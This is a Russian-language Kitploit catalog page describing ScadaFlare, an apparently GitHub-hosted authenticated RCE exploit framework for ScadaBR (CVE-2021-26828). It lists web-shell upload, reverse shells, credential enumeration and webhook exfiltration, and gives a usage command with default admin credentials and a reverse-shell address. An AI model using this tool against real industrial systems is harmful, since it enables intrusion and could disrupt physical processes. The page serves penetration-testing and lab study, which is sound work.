Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare аутентифицированный RCE фреймворк эксплуатации для ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Инструменты/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияБезопасность SCADA/ICSЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare аутентифицированный RCE фреймворк эксплуатации для ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

58 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

ScadaFlare - Набор инструментов для аутентифицированного RCE CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Модульный эксплойт аутентифицированного RCE, нацеленный на ScadaBR <1.1.0, расширенный для операций красных команд.

Демонстрация ScadaFlare

Возможности

  • Загрузка вооруженной оболочки .jsp через view_edit.shtm
  • Поддержка нагрузок для Linux и Windows
  • Поддержка прокси SOCKS5 / HTTP
  • Запуск обратной оболочки (стандартной или base64)
  • Модули перечисления (БД, учетные данные, Log4Shell и др.)
  • Экфильтрация через webhook (Slack / Discord)
  • Генерация скрипта ресурса Metasploit
  • Поддержка очистки (аварийное отключение)

Соответствие технике MITRE ATT&CK

CVE

  • CVE-2021-26828
  • Обнаружено Фелипе Оливейрой
  • Эксплойт улучшен и модуляризован

Для чего это нужно

Этот эксплойт был разработан при анализе сценария HTB Pro Lab: Alchemy. Изначальный PoC от Фелипе Оливейры был качественным, но:

  • Написан на Python 2
  • Не имел современных функций, таких как поддержка прокси, очистка оболочки, цепочки перечисления
  • Был сложен для расширения или интеграции в рабочие процессы красных команд

ScadaFlare — это полная переработка на Python 3 с модульной поддержкой, несколькими стратегиями обхода, определением ОС с возможностью переопределения, интеграцией webhook, поддержкой SOCKS-прокси и цепочками перечисления для использования операторами в реальных условиях.

Использование

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Только законное и этическое использование

ScadaFlare предназначен исключительно для:

  • Обучения этичному взлому
  • Тестирования SCADA-лабораторий
  • Оборонительных исследований и проверки уязвимостей

Несанкционированное использование против реальных промышленных систем может:

  • Нарушить физические процессы
  • Привести к повреждениям или угрозам безопасности
  • Повлечь серьезные юридические последствия

Используя этот инструмент, вы принимаете полную ответственность за:

  • Получение явного письменного разрешения
  • Работу только в одобренных средах

Лицензия

Лицензия MIT – см. LICENSE

Скачать инструмент
ФазаТехникаID
Начальный доступ (после аутентификации)Допустимые учетные записиT1078
ВыполнениеЭксплуатация публичного приложенияT1190
Выполнение командВеб-оболочкаT1505.003
Действия с привилегиямиИзменение веб-контентаT1505
Доступ к учетным даннымУчетные данные в конфигурационных файлахT1552.001
РазведкаОбнаружение удаленных системT1018
ЭкфильтрацияЭкфильтрация через веб-сервисT1567.002
Обход защитыТуннелирование через прокси и протоколыT1090